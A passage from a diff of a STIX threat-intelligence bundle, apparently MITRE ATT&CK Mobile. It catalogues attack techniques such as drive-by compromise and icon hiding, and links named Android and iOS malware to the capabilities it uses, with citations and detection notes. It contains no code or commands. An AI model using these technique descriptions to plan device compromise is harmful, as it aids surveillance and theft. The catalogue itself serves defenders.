"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Generation Algorithms", + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, a more general approach for detecting a suspicious domain is to check for recently registered names ", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:24:56.530Z", + "name": "Drive-By Compromise", + "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring an [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Lookout-StealthMango)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can often alert the user if their device is vulnerable to known exploits.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "created": "2017-10-25T14:48:06.822Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1456", + "external_id": "T1456" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-22.html", + "external_id": "CEL-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fd658820-cbba-4c95-8ac9-0fac6b1099e2", + "created": "2019-07-11T18:09:42.039Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1508", + "url": "https://attack.mitre.org/techniques/T1508" + }, + { + "source_name": "sunny-stolen-credentials", + "url": "https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/", + "description": "Lukáš Štefanko. (2017, February 22). Sunny with a chance of stolen credentials: Malicious weather app found on Google Play. Retrieved July 11, 2019." + }, + { + "source_name": "android-trojan-steals-paypal-2fa", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/", + "description": "Lukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019." + }, + { + "source_name": "bankbot-spybanker", + "url": "https://www.cyber.nj.gov/threat-profiles/android-malware-variants/bankbot-spybanker", + "description": "NJCCIC. (2017, March 2). BankBot/Spy Banker. Retrieved July 11, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "A malicious application could suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed, and to make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions.\n\nThis behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker)", + "modified": "2022-03-30T20:07:33.279Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Suppress Application Icon", + "x_mitre_detection": "The user can examine the list of all installed applications, including those with a suppressed icon, in the device settings.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7b8c3ae2-7e52-4f1d-ad30-788b367a7531", + "type": "relationship", + "created": "2019-08-07T15:57:13.417Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "url": "https://securelist.com/mobile-banker-riltok/91374/", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019." + } + ], + "modified": "2019-09-15T15:36:42.340Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) can query various details about the device, including phone number, country, mobile operator, model, root availability, and operating system version.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4fc165fd-185e-4c70-b423-c242cf715510", + "created": "2019-10-07T16:32:27.127Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:55:21.480Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) checks if it is running in an analysis environment.(Citation: securelist rotexy 2018) ", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--69de3f7e-faa7-4342-b755-4777a68fd89b", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Zscaler-SuperMarioRun", + "url": "https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat", + "description": "Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 – DroidJack RAT. Retrieved January 20, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[DroidJack](https://attack.mitre.org/software/S0320) is capable of recording device phone calls.(Citation: Zscaler-SuperMarioRun)", + "modified": "2022-05-20T17:13:16.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1f7428d7-6f6e-40d0-aedb-cb0578875ff9", + "created": "2021-10-01T14:42:49.170Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:26:02.260Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can hide its icon.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--935fd3e3-dd47-4c43-bdd8-1668af26395f", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "PaloAlto-SpyDealer", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) enables remote control of the victim through SMS channels.(Citation: PaloAlto-SpyDealer)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--04ec5f2f-b14f-46ae-b151-05f9b7af0bcc", + "created": "2023-03-20T18:37:57.767Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:37:57.767Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1f027bab-76d9-4f5f-a73e-ea733a1ab223", + "type": "relationship", + "created": "2020-11-20T16:37:28.610Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T16:37:28.610Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) has been distributed in two stages.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0ef4845d-994e-4f0d-9eed-7cf600fc03b4", + "type": "relationship", + "created": "2020-06-02T14:32:31.885Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-02T14:32:31.885Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can track the device’s location.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8b66543e-2ea1-4ff7-84d9-f8f431f53781", + "type": "relationship", + "created": "2020-04-24T15:06:33.503Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T15:06:33.503Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can record MP4 files and monitor calls.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2a5f4f05-bd60-4571-bcce-f3b764a5b5a0", + "created": "2023-02-28T20:30:01.082Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:08:11.662Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can retrieve the contacts list from an infected device.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--23fa0fcc-0193-45f2-9e0b-a5f68380015f", + "created": "2022-04-01T18:52:13.171Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security software can typically detect if a device has been rooted or jailbroken and can inform the user, who can then take appropriate action.", + "modified": "2022-04-01T18:52:13.171Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--db34a2c8-01e0-4cd3-a497-0f4bca36812a", + "created": "2020-01-27T17:05:58.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:27:51.998Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain the device’s call log.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f0e39856-4d2d-45c5-bf16-f683ee993010", + "created": "2022-03-30T18:18:15.915Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T18:18:15.915Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--cde2cb84-455e-410c-8aa9-086f2788bcd2", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8c7598a6-6046-491d-99a7-52c31974a9a9", + "created": "2023-03-20T18:57:40.504Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:57:40.504Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5b37d94a-64a3-432a-b340-1c9a4f553d02", + "type": "relationship", + "created": "2020-12-17T20:15:22.452Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2020-12-17T20:15:22.452Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) has obfuscated components using XOR, ZIP with a single-byte key or ZIP/Zlib compression wrapped with RC4 encryption.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3e2b9dc1-5da0-46a1-a576-4b41a10f3a60", + "created": "2020-11-24T17:55:12.828Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:21:27.210Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can access the device’s contact list.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a20581b4-21fa-4ed9-b056-d139998868e8", + "created": "2019-09-04T14:28:15.970Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:52:44.819Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can retrieve the device's contact list.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7a8e1611-1a7e-45a0-b518-6efd744fce4f", + "type": "relationship", + "created": "2020-12-24T22:04:28.002Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:28.002Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has sent messages to an attacker-controlled number.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a5b72279-f99e-4f03-8669-04322b40ee6b", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "modified": "2020-07-20T13:49:03.710Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) loads an encrypted DEX code payload.(Citation: TrendMicro-XLoader)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a8565c17-7054-4d3f-bca5-6e17dc931491", + "created": "2023-03-03T16:20:08.033Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:20:08.033Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has used private APIs to download and install other pieces of itself, as well as other malicious apps. (Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3c291ee5-1782-4e5b-8131-5188c7388f45", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) gathers the device phone number and IMEI and transmits them to a command and control server.(Citation: FireEye-RuMMS)", + "relationship_type": "uses", + "source_ref": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c340b30d-0ad5-4e90-94ce-b6a6b229a7c4", + "created": "2020-09-15T15:18:12.362Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020.", + "url": 